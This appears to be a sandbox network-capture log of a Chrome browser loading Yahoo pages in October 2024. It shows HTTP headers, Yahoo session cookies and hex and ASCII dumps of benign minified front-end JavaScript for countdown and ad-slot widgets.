                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: derItems[r];s=e!==a,a.setAttribute("aria-hidden",s+"");var n=N(a);s?n.forEach(function(e){e.setAttribute("tabindex","-1")}):n.forEach(function(e){e.removeAttribute("tabindex")})}}},{key:"scrollViewWithNativeSync",value:function(){if(!this._state.locked){v


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              108192.168.2.45112987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC542OUTGET /aaq/wf/wf-countdown-1.2.5-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC739INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: d/kz3ZvvvVnx9EFC9bAKVYZnFGAtc6LiY/JfIp86eF9ixtly8vdt52KVY4ORnHSwfroBIH8vmpQxSFHig+tNwvOcd0I2Vw16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 3DM72CSZTSD3M3S4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 18:43:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Sep 2020 18:50:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "681d57e9e7cbef5de44544c13f8ca62e"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=315360000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: CQ1lP8549yVnp28g4QLu9GcN8rB3ImgO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 1820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-countdown",[],t):"object"==typeof exports?exports["wafer-countdown"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 65 78 65 63 28 6e 29 2c 73 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 26 26 61 5b 31 5d 3b 73 26 26 28 6e 3d 73 29 7d 69 66 28 6e 29 7b 76 61 72 20 75 3d 6c 28 6e 29 2c 69 3d 6e 65 77 20 4d 61 70 3b 75 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 73 65 74 28 65 2c 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 2d 22 2b 65 29 5b 30 5d 29 7d 29 3b 76 61 72 20 66 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 66 2d 63 6f 75 6e 74 64 6f 77 6e 2d 65 6e 64 64 61 74 65 22 29 3b 66 26 26 69 2e 73 69 7a 65 3d 3d 3d 75 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 73 65 74 75 70 43 6f 75 6e 74 28 69 2c 66 2c 6f 29 7d 7d 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: exec(n),s=Array.isArray(a)&&a[1];s&&(n=s)}if(n){var u=l(n),i=new Map;u.forEach(function(e){i.set(e,t.getElementsByClassName("wafer-countdown-"+e)[0])});var f=t.getAttribute("data-wf-countdown-enddate");f&&i.size===u.length&&this.setupCount(i,f,o)}}return
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC448INData Raw: 74 54 69 6d 65 49 6e 74 65 72 76 61 6c 29 7d 7d 5d 29 2c 65 7d 28 29 2c 70 3d 77 2c 68 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72 42 61 73 65 43 6f 6e 74 72 6f 6c 6c 65 72 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 6e 3d 65 2e 72 6f 6f 74 2c 72 3d 76 6f 69 64 20 30 3d 3d 3d 6e 3f 64 6f 63 75 6d 65 6e 74 3a 6e 2c 73 3d 65 2e 73 65 6c 65 63 74 6f 72 2c 75 3d 76 6f 69 64 20 30 3d 3d 3d 73 3f 22 2e 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 3a 73 3b 6f 28 74 68 69 73 2c 74 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tTimeInterval)}}]),e}(),p=w,h=window.wafer.controllers.WaferBaseController,y=function(e){function t(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},n=e.root,r=void 0===n?document:n,s=e.selector,u=void 0===s?".wafer-countdown":s;o(this,t)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              109192.168.2.45113287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC538OUTGET /aaq/wf/wf-benji-1.2.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: H8A9aQsB9Grev2+TJOHJOEjRTfIe98iG1aRVqGsnp+zOi4H+eIiUR072g85InZoxMsvaJeg7hbM=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 3D0DM5SD5X72PRAP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 13 Sep 2024 15:59:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 20 May 2024 21:26:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "11cf4f9bff98fc79f8eecf2894832023"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: tIzwVm575mAKu9xUI7zQ09wGt6PpRi8K
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8353
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 2171632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 65 6e 6a 69 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 65 6e 6a 69 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-benji",[],t):"object"==typeof exports?exports["wafer-benji"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2e 6b 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: );throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),l=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.ke
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 74 68 69 73 2e 5f 75 74 69 6c 3b 72 65 74 75 72 6e 7b 6f 66 66 73 65 74 58 3a 65 2e 6f 66 66 73 65 74 58 2c 6f 66 66 73 65 74 59 3a 65 2e 6f 66 66 73 65 74 59 2c 74 72 69 67 67 65 72 3a 65 2e 74 72 69 67 67 65 72 7d 7d 7d 5d 29 2c 74 7d 28 76 29 3b 77 2e 65 76 65 6e 74 73 3d 7b 7d 3b 76 61 72 20 6a 3d 77 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: this._util;return{offsetX:e.offsetX,offsetY:e.offsetY,trigger:e.trigger}}}]),t}(v);w.events={};var j=w,m=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 69 65 77 70 6f 72 74 22 3d 3d 3d 6f 26 26 28 69 3d 6b 28 65 2c 7b 6f 66 66 73 65 74 58 3a 2d 31 2a 6e 2c 6f 66 66 73 65 74 59 3a 2d 31 2a 72 7d 2c 43 2e 76 69 65 77 70 6f 72 74 29 29 2c 69 26 26 76 2e 74 72 69 67 67 65 72 46 6f 72 45 6c 65 6d 65 6e 74 73 28 5b 65 5d 2c 7b 73 6f 75 72 63 65 3a 22 73 74 61 74 65 22 7d 29 7d 2c 62 2e 73 79 6e 63 28 29 2c 62 7d 72 65 74 75 72 6e 20 66 28 74 2c 65 29 2c 6d 28 74 2c 5b 7b 6b 65 79 3a 22 5f 63 68 65 63 6b 49 66 42 65 6e 6a 69 4e 61 6d 65 53 70 61 63 65 45 78 69 73 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: iewport"===o&&(i=k(e,{offsetX:-1*n,offsetY:-1*r},C.viewport)),i&&v.triggerForElements([e],{source:"state"})},b.sync(),b}return f(t,e),m(t,[{key:"_checkIfBenjiNameSpaceExist",value:function(){var e=this,t=arguments.length>0&&void 0!==arguments[0]?arguments
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 72 43 6c 61 73 73 29 2c 43 2e 65 6d 69 74 57 61 66 65 72 45 76 65 6e 74 28 22 62 65 6e 6a 69 3a 65 72 72 6f 72 22 2c 7b 65 6c 65 6d 3a 6e 2c 6d 65 74 61 3a 7b 64 61 74 61 3a 65 2c 69 64 3a 74 7d 7d 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 6c 69 73 74 65 6e 54 6f 42 65 6e 6a 69 45 76 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 73 74 61 74 65 3b 69 66 28 21 65 2e 61 64 64 65 64 4c 69 73 74 65 6e 65 72 46 6f 72 62 65 6e 6a 69 45 76 65 6e 74 73 29 7b 65 2e 61 64 64 65 64 4c 69 73 74 65 6e 65 72 46 6f 72 62 65 6e 6a 69 45 76 65 6e 74 73 3d 21 30 3b 76 61 72 20 74 3d 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 3b 74 2e 6f 6e 28 22 52 45 4e 44 45 52 5f 53 55 43 43 45 45 44 45 44 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rClass),C.emitWaferEvent("benji:error",{elem:n,meta:{data:e,id:t}})}}},{key:"listenToBenjiEvents",value:function(){var e=this._state;if(!e.addedListenerForbenjiEvents){e.addedListenerForbenjiEvents=!0;var t=window.benji;t.on("RENDER_SUCCEEDED",this.handle
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC553INData Raw: 65 79 3a 22 68 61 6e 64 6c 65 52 65 73 69 7a 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 44 65 62 6f 75 6e 63 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 77 69 6c 6c 56 61 6c 69 64 61 74 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 5b 5d 2c 6e 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 3b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 6e 2e 67 65 74 28 65 29 2c 6f 3d 72 2e 69 6e 73 74 61 6e 63 65 2c 69 3d 6f 2e 63 6f 6e 66 69 67 2c 61 3d 69 2e 6f 66 66 73 65 74 58 2c 73 3d 69 2e 6f 66 66 73 65 74 59 2c 66 3d 69 2e 74 72 69 67 67 65 72 3b 22 76 69 65 77 70 6f 72 74 22 3d 3d 3d 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ey:"handleResize",value:function(){this._validateWithDebounce()}},{key:"willValidate",value:function(e){var t=[],n=this._state.elementInstances;e.forEach(function(e){var r=n.get(e),o=r.instance,i=o.config,a=i.offsetX,s=i.offsetY,f=i.trigger;"viewport"===f


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              110192.168.2.45113387.248.119.2524431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1407OUTGET /caas/content/article/?uuid=53c53b29-181a-3610-abb6-7342d7ac1416,c0d99429-8a1e-3aa0-b598-bde24fb0d1b7,7fcfc158-f6e5-3b23-a4e2-e608b9d58220&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC638INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-methods: GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-length: 120089
